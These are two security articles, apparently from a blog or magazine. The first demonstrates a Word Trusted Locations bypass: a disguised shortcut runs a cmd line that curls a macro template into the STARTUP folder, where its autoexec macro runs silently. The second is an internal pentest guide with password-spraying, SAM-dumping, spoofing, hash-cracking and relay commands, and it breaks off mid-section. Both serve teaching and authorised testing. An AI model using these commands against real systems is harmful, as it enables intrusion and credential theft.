by Adam Maraziti

Ronald Reagan once said, “Trust, but verify”.  That holds true even for Cybersecurity.  We are long past the days of relying on software companies to implement default settings with a security first focus.  It is on organizations to review administrative guides, default settings and various best practices to securely configure new and existing software.  Even then, some built-in functionality cannot be changed and organizations are forced to get creative with solutions to mitigate the associated risks.  Usually, this is more of an issue when a larger software company determines that a security concern is not great enough to warrant a patch or a change in functionality because the product, in most cases, is widely used in the industry, or it is working as intended (as determined by the software company).  One such company is Microsoft and its suite of Office products.

This article will speak about some advanced topics, however, the user should have enough information within the article to understand the core concepts utilized. The goal is to provide some information on the product, the functionality of the product, an in-depth look at how the software steps through the process, and how this is exploited, including a unique attack chain, and finally, some best practices an organization can utilize to prevent it.

Background Information

It is no secret that a very large portion of organizations utilize Microsoft Office products.  While there is a large shift happening to Office 365 and cloud-based usage, there are still a substantial number of users utilizing Office on their local machines.  The most recent Microsoft reported statistic of user information on Office was from their Build 2016 Keynote on day 2, which had a slide (Figure A) that showed 1.2 billion office users.  Unofficially, it is suspected that number is still over 1 billion but also Office 365 has grown to over 350 million subscriptions.

With that many users, exploiting one of their products means a malicious actor has a very large audience to work with.  Learning how Microsoft Office products work, ways threat actors can use various attack chains to exploit it and how to mitigate those risks are arguably important for everyone and are the focus of the remainder of this article.

Trust Workflow in Office

Microsoft Office has been built to function a specific way and utilize what they call “Trusted Locations”.  These Trusted Locations are the main focus here, so it is important to not only understand what they are but also how they work.  The best way to explain Trusted Locations is to use Microsoft’s own definition.  “Trusted Locations is a feature of Office where files contained in these folders are assumed safe, such as files you create yourself or saved from a trustworthy source. These files bypass threat protection services, bypass file block settings, and all active content is enabled. This means files saved in Trusted Locations aren't opened in Protected View or Application Guard.”  Source: https://learn.microsoft.com/en-us/deployoffice/security/trusted-locations 

By default, these Trusted Locations are configured by Microsoft for Access, Excel, Powerpoint, and Word.  While Project and Visio have the ability to have trusted locations, by default, these are not configured, however, they are configurable by the user or organization based on their settings.  The default locations vary by product but let’s take a look at the Word default Trusted Locations (Figure B):

As shown above, there are three locations, two of which appear to be template related and one for “Startup" (which will be part of our attack chain later).  It is important to note that these can be changed by an organization Administrator or admin user in general, but, by default, these configurations exist for every local install of Word. The first two folder locations, the two “Templates” folders, already exist on the filesystem by default, however, the “Startup” folder does not exist by default even though it is trusted, which is part of what makes this exploit possible.

Let’s dig into how Trusted Locations work.  Microsoft has provided a handy flow chart on how Word steps through the various security steps when opening a file.  Please note that the flow chart (Figure C) has steps labeled 1 through 7 that will be referenced throughout the next few paragraphs.

Step 1

When a user opens a file with a Microsoft Word associated extension such as a .doc or .docx, step one (1) is to identify the location of the file.  

Step 2

Step two (2) checks if the file is located in a Trusted Location. If so, the file will open with all Active Content enabled.  If it is not, it continues to the next step.  

Step 3

Step three (3) checks for any Trust Content via Digital Signatures.  For example, you can add a Digital Signature from a Third Party CA or a self-signed certificate to an Access Database that essentially means that you believe the database is safe and can be trusted.  The digital signature essentially validates that none of the macros, code modules or other executable components in the database have been altered.  If a Digital Signature is trusted, the file opens with all active content enabled.  Else it moves on to the next step.

Step 4a-c

Step four (4) is broken down into multiple parts that all do the same thing but in a different way.  The configuration of your environment will determine how it is processed, but essentially, this step checks your organization’s policies for Trust Center configurations.  Trust Center is where everything is configured; think of it as the security settings for the software (in this case, Word).  It first checks for any Cloud policies (4a), then it checks ADMX or Group Policy (4b), finally it checks local Trust Center settings (4c).  

Step 5a-b

Step five (5) is a subset of Steps four (4) a-c.  Step five (5) acts like step seven (7) where if any of the policies have File Block Settings configured (Figure D) and it matches the file being opened, then it is blocked and nothing more is done.  Otherwise, the policy configuration dictates what happens when it is opened.

A file being blocked in this manner can result in any one of the following error messages:

  • You are attempting to open a file that is blocked by your registry policy setting.
  • You are attempting to open a file type <File Type> that has been blocked by your File Block settings in the Trust Center.
  • You are attempting to open a file that was created in an earlier version of Microsoft Office. This file type is blocked from opening in this version by your registry policy setting.
  • You are attempting to save a file that is blocked by your registry policy setting.
  • You are attempting to save a file type <File Type> that has been blocked by your File Block settings in the Trust Center.

One thing to note is that step four (4)/five (5) and step seven (7) can be one in the same based on the settings configured.  Which step it is configured in doesn’t matter in theory and step seven (7) was recently added by Microsoft to help with security by default.  The additional steps that can be configured in step four (4) are explained in step seven (7) below. 

Step 6

Next, step six (6) checks to see if the file being opened is a Trusted Document.  Unless disabled by an administrator, a user that sees a Security Warning in the top bar of a document that says that Macros have been disabled – if they click the Enable Content button (Figure E) – can effectively make a Trusted Document.  When the document is reopened the macros are no longer blocked and the user is not notified since they previously made it a trusted document.

Step 7

The last step, step seven (7), is to utilize the Office Default settings and configurations to open the document.  This is where some safeguards are built in by default via the Trust Center.  As mentioned previously, these precautions are not exclusive to step seven (7) but rather can be configured by policy in step four (4) as well.  Regardless, they function the same way.

Probably familiar to most, Protected View is an important security feature provided by Microsoft.  It’s their way of protecting your computer from harm while giving you access to the document you downloaded from the internet. The rationale for Microsoft setting documents to Protected View is explained as the following:

“Files from the Internet and from other potentially unsafe locations can contain viruses, worms, or other kinds of malware that can harm your computer. To help protect your computer, files from these potentially unsafe locations are opened as read only or in Protected View (Figure F). By using Protected View, you can read a file, see its contents and enable editing while reducing the risks.”

Source: https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653 

Makes sense and honestly is super easy to configure.  In the Trust Center there is a Protected View section (Figure G) with three options:

To expand on what those Protected View Trust Center settings mean:

  • Enable Protected View for files originating from the Internet - The Internet is considered an unsafe location because of its many opportunities for malicious intent.
  • Enable Protected View for files located in potentially unsafe locations - This refers to folders on your computer or network that are considered unsafe, such as the Temporary Internet folder or other folders assigned by your administrator.
  • Enable Protected View for Outlook attachments - Attachments in emails can come from unreliable or unknown sources.

The last important setting to cover is macros.  On the surface, configuring the setting on what Word is to do when macros are present is simple.  In the Trust Center, there is a Macro Settings section with four settings - three for disabling and one for enabling, and by default, Microsoft has it set to “Disable all macros with notification” (Figure H).

Perfect, right?  Well, yes and no.  Remember that it is important to understand the trust workflow, but not only that, how it relates to macros specifically.  The flow chart (Figure I) below shows each step and if macros are enabled or disabled in that step:

Exploiting the Trust Workflow

This has been a plethora of information about Microsoft and how their Trust Workflow operates.  But let’s start to get into how, understanding the inner workings of this, a threat actor can use a fairly simple attack chain to exploit these default configurations to run malicious code.  The whole premise for this attack would be to get an unexpecting person to open a legitimate PDF file to read, all while we exploit Microsoft’s Trust Workflow to implement our malicious code on their system.

Server Setup:

To get started with testing this exploit, I utilized Python built-in functionality to simulate a webserver.  This was done simply by navigating to the folder that I wanted to simulate as “web-facing”, in this case C:\TrustedSite, then executing the command: python -m http.server (Figure J).

By default, the server listens on port 8000 and binds itself to all interfaces.  This can all be customized via various switches for the http.server module.  See for more information: https://docs.python.org/3/library/http.server.html 

File Configurations:

Now that we have our website simulated, let’s add the files required for the exploit.  Only three total files are needed for this: one legitimate PDF that the user would read, which will be used as our decoy, a shortcut file, and our malicious macro in the form of word template file (Figure K).

The first file is simple as it is a legitimate PDF file.  This can literally be any PDF that you want, however, a threat actor would look to target something related to the individual being exploited.  For our test, I decided to keep it simple and VERY non conspicuous (Figure L):

The next file to create would be the Word template.  This is actually pretty straight forward as well, minus the malicious code or whatever you want it to run via macro.  Start by creating a new blank Word file.  On the developer tab, select Macros (Figure M):

On the next screen, you will name the macro “autoexec”.  This is important as it will auto execute when Word is opened.  This is another “special” Microsoft tidbit not everyone knows about.  There are a select few Auto Macros that are all preconfigured by Microsoft to perform certain functions, and in this case, we are abusing the autoexec one.  You can read about the rest here: https://learn.microsoft.com/en-us/office/vba/word/concepts/customizing-word/auto-macros 

An important note from the above link about auto macros – the autoexec macro will not run automatically unless it is stored in one of the following locations: the Normal template, a template that is loaded globally through the Templates and Add-ins dialog box, or a global template stored in the folder specified as the Startup folder.  This Startup folder is what we will be targeting in our attack chain, the same Startup folder from Figure B.

After naming the macro “autoexec” select the Create button (Figure N) to open up the VBA code (Visual Basic for Applications) that will be associated with the macro.

For our malicious code we are going to run, I am just going to have it simply display a message to us.  Obviously, at this point, what is chosen to execute is totally up to the malicious actor.  This exploit executes every time Word is opened with no prompt or acceptance by the user, it just runs.  VBA is a powerful scripting language that can expose numerous APIs, objects, and events allowing a malicious actor to interact with the system from the somewhat privileged context of a trusted application.  They can make use of VBA code, COM objects, OLE automation, and Win32 APIs to explore the host, access the filesystem, and run commands, meaning this could be used in a plethora of ways but, for the purposes of this article, we will leave that up to the person running it.

Our VBA code is super simple (Figure O) but here is what each item does.  Sub and End Sub designate a procedure that executes, and all procedures start and end with those.  “autoexec()” signifies that

the built-in autoExec function is utilized, which in this case, is when you start Word or load a global template.  You can ignore the lines with an apostrophe (‘) before them as those are commented out and do not execute (green text below).  Our code we want to run, in this case a simple message box, is dictated by MsgBox followed by whatever you want it to say in between the quotes.  Lastly, the vbMsgBoxSetForeground just ensures that the box is shown in the foreground and not behind any other windows.  All together it looks like the following:

Now that our macro is complete, we can hit the save button then exit the code window, which will drop us back to our original Word document with nothing in it.  We will now need to save this document as a “Word Macro-Enabled Template (*.dotm) (Figure P).  You can name it anything you would like but, in our case, I named it Package.dotm.

While you can save this anywhere you would like, the Microsoft default location drops you into a Custom Office Templates folder under your Documents folder (Figure Q).

Package Shortcut:

Now we have our malicious code template and simulated webserver, it is time to expand the attack chain and auto execute as much as possible without the user knowing.  How, you may ask?  Simple, a shortcut file or more specifically a .LNK.  The functionality of a shortcut file may surprise you.  Simply put, a LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application.  LNK files are based on the Shell Link binary file format, which holds information used to access another data object.  That means we can call an application like PowerShell or CMD.  Also, an important thing to note as we progress, with the release of Windows 10 Insider build 17063 back in 2017, additional functionality was added in Windows that is still present today: Windows now allows you to curl and tar executables executed directly from CMD or PowerShell.  Knowing this, let’s dig in and use that functionality in our exploit.

Let’s start by creating a simple shortcut file by right clicking anywhere in a folder or desktop, select New and Shortcut.  You will be prompted to input the location of the file you are looking to add a shortcut for.  For now, put in the location of CMD, which is, by default, C:\Windows\System32\cmd.exe (Figure R).

  

On the next page, name it whatever you want.  You now have a shortcut file that opens a command prompt.  That will be the base of our shortcut code.  We need to add to our shortcut location in order to make it do what we want.  For this we will dive into the code we will use and explain what it does.

Here is the code that we will utilize (Figure S):

C:\Windows\System32\cmd.exe /q /c 

This will execute/run CMD.  The /q designates turn echo off (quietly) and the /c tells CMD to run and terminate after executing the code so there is no residual evidence of it being run.

explorer http://localhost:8000/DecoyFile.pdf &

This part will open Windows File Explorer on your computer and navigate to the designated website.  In this case, it points to our legitimate PDF so the user is served something they are expecting.  This opens the PDF in Explorer or the user’s configured PDF reading application for the user to read.  The & tells the code to continue to the next line.

 mkdir %appdata%\Microsoft\Word\STARTUP & 

This command tells CMD to run mkdir which creates a folder if one does not exist.  In this case, we are telling the computer to make a folder in the specific location of Microsoft’s default Trusted Sites location (Figure B).  Although the folder location is configured by default, the actual folder does not exist by default, so we need to ensure it is there.  Again, & tells it to continue.

curl -o %appdata%\Microsoft\Word\STARTUP\Package.dotm  http://localhost:8000/Package.dotm

Next, we use that handy functionality Microsoft added to curl a file.  Curl, which is short for Client URL, is a command line tool that enables data transfer over various network protocols.  For this, we point curl to the file we want locally, which is in the orange text, and tell it to output (-o) that file to our newly created or already existing Startup folder in the Trusted Location.

We will now add that code into our shortcut link by right clicking the shortcut file we created and selecting properties.  In here there is a Target box that currently points to CMD.  We can append the remainder of the code (Figure T).

With that being completed, we now have our three files needed to complete this exploit of Trusted Locations in Word.  The goal at this point would be for the target to open the shortcut file thinking it was a legitimate shortcut to a PDF they needed or wanted to view.  A threat actor will, in most cases, disguise the shortcut link as best as possible by naming it something relevant to the user (spear phishing) or changing the shortcut link icon associated with the file to look like a PDF (Acrobat icon).  The goal of all phishing is to get the user to interact with the content and how you get a user to do that is an art on its own, if you will.  For this we will leave a little guesswork up to the reader, however, we will go into detail on how it works when executed.

End Results:

When the LNK shortcut file is clicked, the user will see the legit PDF displayed in their Explorer.  Nothing else.  But in reality, what happens in the background is that CMD executes the series of commands.  It creates a Startup folder in the Default Trusted Location, then copies a Word template file to that folder.  The attack is essentially complete as far as it can be at that point and looks like this (Figure U):

This is what the user can’t see, which is executing in the background when that LNK shortcut file is executed (Figure V).  Due to the switches we use, this is never seen or worst-case flashes on screen.  This is dependent on the user’s configured settings within their default browser, specifically, if it opens maximized or not.  The CMD window will always be behind the PDF if it opens maximized:

Now when the user goes to open Word or any Word-associated file after that point, the malicious macro in the template file will auto execute every single time.  Here is the result of our test (Figure X):

Obviously, this is not malicious the way it is configured, however, a malicious actor could configure the macro to essentially do anything it wanted to within the limitations of VBA.  This works almost too well because of these Trusted Locations and the ability for a basic user with no privileges to create the folder needed to complete this.  As we saw previously, Word executes the macro and bypasses essentially all Trust Center security simply by being in a Trusted Location. There is no notification of a macro being used and no notification from Protected View saying it was downloaded from the internet.

As long as the template file exists, that popup box will continue to open on launch.  However, a couple things to note.  It will not execute for each instance of Word that is opened but rather the first one only.  So if you opened a second Word document while the first one was still open, the macro would not execute again.  Additionally, if the template file in the startup folder is deleted, this does NOT remove the macro.  Rather the macro will still exist even if that template file isn’t loaded as it has to be manually deleted from the macros section within Word.  You would then have to remove the template file as well to fully get rid of it.  It can be a little annoying if not removed properly.

Wrap Up

One thing I want to make sure I cover is the way to mitigate this risk since, essentially, Microsoft does not see it as an issue.  The foolproof method would be to remove all Trusted Locations either by group policy or ADMX.  Both have viable methods to do so.  There are other ways to mitigate the risk either by monitoring those default locations for modifications, or by third-party software.  The best solution for your organization may not be the best for every organization.

While none of this has been earth-shattering, if you will, it is a fun way to look at an attack chain that utilizes built-in functionality and default configurations.   Being such a large product suite, this can be replicated across all four applications with default Trusted Locations (Word, Excel, PowerPoint, and Access), and there is a large chance these settings are not being locked down by organizations.  Most see that macros are disabled and think that mitigates the risk, however understanding the Trust Workflow shows us that there are ways to bypass those settings regardless.

by Dimitris Pallis

Connectivity Basics

Before jumping on to exploitation tools and techniques, the most important step is to connect to the client's network.

This can be done in two ways, either remotely or on-site by going to client's offices. On-site visits would require your own dedicated space and access to the client's network through wired ethernet or wireless connection. After that, you would only have to confirm you are assigned with an IP address and you're ready to go. Other measures could be required such as whitelisting your computer's MAC address, but those details should be handled during the scoping process and you'll know beforehand; if you don't, just ask the project manager who will confirm with the client.

Most of the time, the client agrees to a remote internal assessment. This could be achieved by providing them with a virtual machine, which the client spins up on their internal network and provides you with the IP address. This machine could include a local Nessus installation and other tools such as Responder and Crackmapexec. Finally, one could use the X2Go client tool to connect to that virtual machine through SSH (example below).

X2go client tool

Sometimes, to be able to reach the virtual machine on the client's network, we might need VPN access first. Again, during the scoping process, the client should have indicated on the Statement of Work that a VPN connection is required and should provide valid credentials and instructions for the VPN client software required to connect (Fortigate, Pulse Secure, etc.).

More Advanced Ways of Working

If you prefer to work on the command line, you can simply SSH in rather than using X2Go. SSH's -D flag in order to create a SOCKS proxy over the SSH tunnel is useful, where other tools like Burp and proxychains on your local machine can be configured to send requests via the virtual machine, enabling you to utilize your local setup. You can also access Nessus from your laptop by setting up port forwarding over SSH.

Exporting Files

When our assessment is done and we need to export our screenshots and results, we can compress our client folder on the virtual machine and using our local machine to utilize scp and transfer that folder over:

scp root@<ATTACKBOX-IP>:/home/pentest/Documents/CLIENT-FOLDER.ZIP ~/Documents/

First Foothold & Steps

If you were involved in an internal penetration test before, you'll know that there are two big misconceptions about internal assessments: the one being running Nessus, exporting the results and calling it a day, with the second being achieving Domain Administrator and calling it a day. Those two are just means to an end, with the real goal being to identify any possible attack vector a real attacker would follow in order to compromise our client's network.

Having said that, as soon as we connect to our attacker box to start testing, we can't just jump to adding a new DA account as we need to do some privilege escalation first and lateral movement. At the start of every internal, our first goal is to get a first foothold on the network. Remember that the attacking VM is like going to our client's offices and plugging one of their ethernet cables to our computer; the only knowledge we have is our target scope. So a first foothold on the network would mean acquiring valid domain account credentials or at minimum, access to a machine that would allow us to extract local account credentials from memory.

As of 2022, there are five main vulnerabilities that could give us our first foothold on an internal network:

  1. Missing patches (Bluekeep, ZeroLogon, EternalBlue others with public exploits, etc.)
  2. Outdated Software (Java JMX, Jenkins with RCE, etc.)
  3. Weak Password Policy & Reuse (e.g. Spraying with Password2022! against user list or Administrator:Administrator on RDP/SMB)
  4. WPAD/LLMNR/IPv6 Spoofing (Cracking captured NetNTLMv2 hashes)
  5. SMB Signing Not Required (Relaying captured hashes to hosts)

Note: If a VPN connection is required to connect to our client's network, they might provide us with valid domain credentials. Using these credentials as a first foothold to move laterally into the network is inaccurate, false and basically cheating as we did not exploit any of the vulnerabilities mentioned above and we can't prove there is risk. Supposedly, our internal consists of seven days (five days testing and two reporting); if we can't get our first foothold on the first two days, then we can kindly ask the client to provide us with another domain account so that we save time, by assuming we got our first foothold (since we don't have unlimited time as a real adversary would have). We make sure to mention that on the final report of course.

Automated Scanning

Above vulnerabilities 1, 2 and 5 can and will be discovered by our Nessus scans (plus Nmap), so as a first step after connecting to our attacker box, browse to https://0.0.0.0:8834, which is where Nessus should run locally (we can confirm it is by running sudo /etc/init.d/nessusd status) and login with the correct credentials.

As soon as you do, go to New Scan on the top right corner and click on Advanced Scan, where you'll have the option to paste your client's target list and change basic settings, such as the scan name, discovery options and schedule (you can pre-configure those during your set-up day so the scan starts at 8:30 a.m  the first day of testing and you don't lose precious time). There is no perfect configuration for Nessus, however, you can try importing plugins and leaving out some unnecessary findings.

We'll let Nessus do its thing; in the meantime, we'll create a folder with our client's name (and within those two subfolders by the name scans and screens) so we gather all findings there. As soon as we do that, we'll press CTRL + SHIFT + T on our terminal six times to open six different tabs for the six different Nmap scans we'll run:

Disclaimer: Nessus scans will most likely find the same results but it's good to double check and refer to them locally without having to open the Nessus report every time. Also, every analyst is different and may have their own methodology; use this guide as a reference and, eventually, see whatever works best for you.

Note: -oN option will output to normal results, you could use -oG instead for greppable format or -oA for normal, greppable and XML at the same time.

nmap -Pn -F -iL targets.txt -oN general-scans.txt --open

(Will perform a fast scan of the top 1000 open ports without pinging the hosts and save results in normal format)

nmap -Pn -sV -p 80,8080,443,19000,20300,7004,7778,7779,8019,8090,8443,8989,90,9095,9704,5000,450 --script=http-enum.nse -iL targets.txt --open -oN web-apps.txt

(Will scan for, grab the banner and enumerate the given open web server ports without pinging the hosts and save the results to a normal format)

nmap -Pn -sV -p 3389,1433,3306,445,139 -iL targets.txt -oN services.txt --open

(Will scan and grab the banner for open RDP, SMB, SQL Server, MySQL ports without pinging the hosts and save to normal format)

nmap -Pn -sV -p 21,22,23,25 -iL targets.txt --open -oN brute.txt

(Will scan and grab the banner for brute-forceable open FTP, SSH, TELNET, IMAP ports without pinging the hosts and save to normal format)

nmap -Pn -sV -p 21,23,80,8080,110,143,1521 -iL targets.txt --open -oN plaintext.txt

(Will scan and grab the banner for plaintext open FTP, TELNET, HTTP ports without pinging the hosts and save to normal format)

nmap -Pn -p 445 -iL targets.txt --script smb-security-mode.nse --open -oN nosign.txt

(Will scan for open SMB servers that do not require SMB signing without pinging the hosts and save to normal format - using the Kali tools, this can be also achieved with Crackmapexec by running:

crackmapexec smb IPRANGES/SMBservers.txt --gen-relay-list relayTargets.txt
Nmap results

The list of SMB servers that don't require signing we'll keep on file for now (until our relaying attacks), since Nessus will already have generated a few results and it’s time for us to review. The next part is pretty straight-forward:
We will be reviewing Nessus and Nmap for results and versions that are vulnerable to exploits and determine if they can get us our first foothold. We will also have a list of misconfigurations that could help in getting access to victim hosts, such as null sessions on SMB servers or anonymous FTP access.

Nessus results

We can use Google to search software versions for public exploits or, by clicking on the vulnerability on Nessus, it will provide us with CVE and details on whether there is a public exploit or not.

Both Nmap and Nessus will give us a list of web servers and it would be for best enumeration practices to have a list of screenshots for every web server in the network so we don't have to manually visit each one if there are Apache exploits or go through all Nessus results to find that Jenkins. They will also be useful for password spraying attacks later if there are brute forceable panels.

We can use the Gowitness tool (install and have a quick look at Github) to gather these screenshots but first we need to gather all web servers in XML format, otherwise Gowitness wouldn't understand the input file:

nmap -Pn -p <WEBSERVERPORTS> -iL targets.txt --open -oX webscreens

(Scans for open web server ports and saves results in XML format)

gowitness nmap --file webscreens -P ~/Documents/CLIENTNAME/internal -X 1280 -Y 720

(Grabs screenshots of web server ports indicated on nmap's XML file and saves them to "internal" folder on 1280x720 resolution)

This is it for outdated software and missing patches (vulnerabilities 1 and 2), following up with "Weak Password Policy & Reuse" (vulnerability 3 on first foothold list) exploitation. If you believe I have missed something, feel free to ping me on “dmitris@protonmail.com”. If you do detect generic findings that could be useful to the client, such as SMB version 1, default SNMP strings or Unrestricted Powershell, you will, of course, be reporting them, however, this guide mostly focuses on getting your first foothold.

Password Spraying

Weak passwords and their re-usage across multiple domain or local accounts is your best mate when you're testing networks with a robust patching policy or when everything else has failed (LLMNR-IPv6 disabled or signing required on all hosts so no relaying). There are multiple services we can use to spray passwords including internal OWA and SSH, but the elephant in the room is Server Message Block (SMB). If SMB is not available on a host but Remote Desktop Protocol (RDP) is, we can spray against RDP instead using Hydra.

Note: Be aware of the lockout policy! Domain accounts could be locked on the 3rd invalid attempt for 15 minutes. Make sure to spray maximum two passwords for every account per 45 minutes or check if the tool you're using to spray has an option for the same.

We already have a list of open SMB ports through our Nmap scans above or we can head to Nessus and filter search by ports 139 and 445. There should be an informational finding about "services report" including SMB servers (SMB signing is irrelevant at this stage since we'll spray passwords not relay them). All we need at this moment is a list of (potentially) valid usernames we can spray against. Several valid usernames can be discovered through enumerating LDAP or SMB and potentially valid usernames can be generated through online OSINT and adjusted to the correct format:

nmap -n -sV --script "ldap*and not brute" -p389 <domain-controller-ip>

ldapsearch -x-h <ip> -s base

(Enumerating LDAP for valid usernames without providing a user list)

The usernames we can get by enumerating LDAP may be minimal so we'll have to do some online OSINT in order to generate a list of usernames and password spray them all or remove the false positives first and then spray them against a weak password. The tool we are going to use to generate a list of usernames is CrossLinked. This tool grabs employee names from LinkedIn and generates a list of email accounts according to the format we have provided it with:

python3 crosslinked.py -f '{f}{last}@clientcompany.com' "clientcompany" -o ~/Documents/internal/users.txt

(Will generate and save a list of client company employees in the format of first letter of first name followed by last name, e.g., dpallis@clientcompany.com)

This is the format that is commonly found within Active Directory environments and can be determined by lots of ways such as discovering one from LDAP enumerating, capturing a hash through spoofing, as we'll see below, or spraying an internal OWA with a tool like Metasploit. As soon as we discover the format and generate a list of user accounts through Crosslinked (don't forget to leave the username only and cut the rest "@domain.com" - cat users.txt |cut -d "@" -f1 > justusers.txt), we can determine the validity by querying Kerberos (search on Nessus for hosts with open port 88 to detect Kerberos):

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="{Domain_Name}",userdb={justusers.txt} {IP}

Instead of Nmap, we can also install and use the Kerbrute tool which is built for this purpose. If our password spraying attempts are successful and we do get our valid domain credentials, we could then easily get a list of all domain accounts. Since we have not achieved that at the moment, let's proceed with the actual spraying. The popular tool Crackmapexec, which is already found under our Kali, can be used to spray against both local and domain accounts by using the user list we generated above and the list of hosts with open SMB servers:

crackmapexec smb <IP> -u justusers.txt -p Password@2022 –sam --continue-on-success

(Will try to authenticate all users within justusers.txt against the weak password "Password@2022" on one specified host and dump the SAM database) 

Example:

Dumping SAM with Crackmapexec

If Crackmapexec manages to discover multiple accounts under the same password "Password@2022" it means we have "Password Reuse", which is considered a High risk finding on our report. Generating and spraying against potential valid domain accounts is an essential step of our methodology, however, it is usually the case that we have local password reuse for administrative accounts on multiple hosts. Crackmapexec can also identify those accounts and again retrieve the SAM database providing us with a quick win:

crackmapexec smb <IP-list> -u Administrator -p Administrator --sam --local-auth --continue-on-success

(Will try to authenticate the local "Administrator" user against the weak password "Administrator" on the given hosts list and dump the SAM database)

In this case, we've provided Crackmapexec with a list of all open SMB servers as the Administrator is a local account and we do not have to worry about lockouts if it's sprayed on multiple hosts. There's also the case that some of the hosts might not have SMB enabled but instead make use of the Remote Desktop Protocol (RDP). Respecting the same rules on domain account lockouts that we saw above, we can try spraying against the RDP service with the local Administrator or the accounts generated on our list using the Hydra tool:

hydra -t 1 -V -l Administrator -P Administrator rdp://<IP>

(Will bruteforce the local (-l) Administrator account against the provided IP address and provide verbose results | remove -l option for domain users)

Wrapping up with password spray, as mentioned above, if we get lucky and obtain valid accounts credentials, we could still use Crackmapexec to dump SAM databases from hosts that our credentials work with, download all domain accounts, retrieve password policy and report on it, try Kerberoasting,or run Bloodhound to find the quickest way to Domain Admin and other attacks. You could also refer to this graph for further attacks after obtaining valid domain credentials.

Spoofing

By default, Windows systems use the following priority list while attempting to resolve name resolution requests through network based protocols:

  1. DNS
  2. Link-Local Multicast Name Resolution (LLMNR for short) protocol
  3. Net-BIOS Name Service (NBT-NS) protocol

When a DNS name server request fails, Windows systems use LLMNR and Net-BIOS Name Service (NBT-NS) for fallback name resolution. They perform an unauthenticated UDP broadcast to the network asking if any other system has the name it’s looking for. This process is unauthenticated and, broadcasted to the whole network, allows any machine on the network to respond and claim to be the target machine. 

By listening for LLMNR & NetBIOS broadcasts, it’s possible for attackers to masquerade as the machine (spoof) the client is trying to authenticate with. After accepting the connection, it’s possible to use a tool like Responder to forward on requests to a rogue service (like SMB TCP: 137) that performs the authentication process. During the authentication process, the victim will send our rogue server a NTLMv2 hash for the user that’s trying to authenticate. Responder captures these NetNTLMv2 hashes. You can not try “Pass the Hash” attacks with these but you can crack them or you can relay them to other machines.

sudo responder -I eth0 

(Listens for broadcasts where -I is your internal network interface and provides OS fingerprint with verbose results)

Captured NetNTLMv2 hash

Also, Web Proxy Auto-Discovery (WPAD) is a protocol used for discovering web proxies on the network. By default, Windows is configured to ask the domain for the location of a configuration file Proxy Auto Config (PAC) that contains the information for a Web proxy to use on the network.

Automatic discovery of the PAC file is useful in an organization because the device will send out a broadcast asking for the proxy file and receive one. However, it naturally does not authenticate who is sending the proxy file, allowing an attacker to send a spoofed answer, which then asks for credentials.

Responder will run a fake HTTP server and act like it is serving up the proxy for the network, so the victims get a basic authentication box popped up on the machine. Most people who are just going to work will type in their username/password without thinking twice about it. This will result in no internet access while the attack is undergoing. Once we cancel this, they will have access to the network as usual. 

sudo responder -I eth0 --wpad

(Listens for broadcasts and enforces WPAD spoofing)

What the victim sees during a WPAD spoofing attempt

Now we should see some hashes (NTLMv2) captured. The captured hashes are output into the logs file of Responder (/usr/share/responder/logs)

At this point, we have two options, either relay the hash, which we'll see later on, or crack it using a (Kali Linux inherit) tool called Hashcat:

hashcat -m 5600 ~/TMP/dimitris/hash.txt  wordlist.dic -O -w3 -r /opt/hashcat/rules/cracker.rule

(Will attempt to crack NetNTLMv2 (5600) hashes with kernel optimization (-O) using the "hob064" rule and "badmofo" wordlist)

Dumping the SAM database with Crackmapexec would give you NTLM type hashes, which fall under the -m 1000 mode and not netNTLM v1 or v2). Moving on to IPv6 spoofing;

By default, IPv6 is enabled and actually preferred over IPv4, meaning if a machine has an IPv6 DNS server, it will use that over the IPv4. Also by default, Windows machines look for an IPv6 DNS server via DHCPv6 requests, which if we spoof with a fake IPv6 DNS server, we can effectively control how a device will query DNS. The mitm6 tool starts with listening on the primary interface of the attacker machine for Windows clients requesting an IPv6 configuration via DHCPv6.

So we start mitm6, which will start replying to DHCPv6 requests and afterwards to DNS queries requesting names in the internal network:

mitm6 -d <domainname>.local

(Will spoof and assign rogue IPv6 DNS to victims)

IPv6 assigned to victim

If we do manage to intercept hashes with Responder or assign IPv6 addresses with mitm6, this automatically means that we can add a new High risk finding to our report called "LLMNR/NetBIOS - DHCPv6 Spoofing". Finally, as we'll see below, we can have mitm6 and NTLMrelayx tool do the WPAD spoofing instead, so if you're running Responder at the same time, make sure it is not doing the same.

SMB Signing Not Required (Relaying)

Instead of cracking hashes with Hashcat to find the cleartext password, you can relay those hashes to specific machines and potentially gain access. An SMB relay attack is where an attacker captures a user’s NetNTLM hash and relays it to another machine on the network. Masquerading as the user and authenticating against SMB to gain shell or file access. A brief explanation on how this works:

A user requests access to a resource on a different device.  The remote device asks for a verification of the user’s identity by sending a random, 8-byte number to the client.  The client takes this number, takes the user’s password hash, performs a calculation on the number, and then sends that computed result back to the remote device.  The remote device checks that the result matches what it expects. If it gets a valid response, it allows the user access to the resource.

SMB relays are inserted in this authentication path, forwarding the requests and responses between the user’s client and a device the attacker actually wants access to.  An attacker selects the target and waits for something to authenticate to their attacking device (i.e. an already compromised client workstation). When something tries to access the attacking device with NTLM authentication, the attacking device forwards the authentication attempt to the target. The target generates the challenge request and sends it to the attacker. The attacker forwards that challenge back to the original device trying to authenticate to the attacking device. The original system encrypts the challenge with the correct hash and sends that to the attacking device. The attacking device then forwards the correctly encrypted response to the target and successfully authenticates, just as if the original device was authenticating to the target and not the attacking device.  

SMB signing verifies the origin and authenticity of SMB packets. Effectively, this stops man-in-the-middle SMB relay attacks from happening. If this is enabled and required on a machine, we will not be able to perform a SMB relay attack. By default, all Domain Controllers are configured to require SMB signing but all other hosts are not. 

First off we'll need a list of all SMB servers that do not require signing. We can grab these through Nessus, Nmap or Crackmapexec as we saw at the start of this guide.

Secondly, we will need a tool called NTLMrelayx that will grab the hashes retrieved from Responder or mitm6 and relay them to hosts without SMB signing, which is also included in our Kali Linux toolset. Having said that, we need to be running either Responder or mitm6 at the same time on different tabs. We saw in the previous section how to use mitm6 and it does not need further configuration in order to run alongside NTLMrelayx. However, if you decide to use Responder instead to help with relaying, you'll need to disable SMB and HTTP servers in its configuration file (/usr/share/responder/Responder.conf) because NTLMrelayx will need them to do the relaying:

Disabling SMB & HTTP servers on Responder configuration

NTLMrelayx will respond to broadcasts and listen for connections on port 445 and port 80. When there are LLMNR broadcasts, NTLMrelayx will relay them to hosts in the targets.txt file (the ones that don't require SMB signing). 

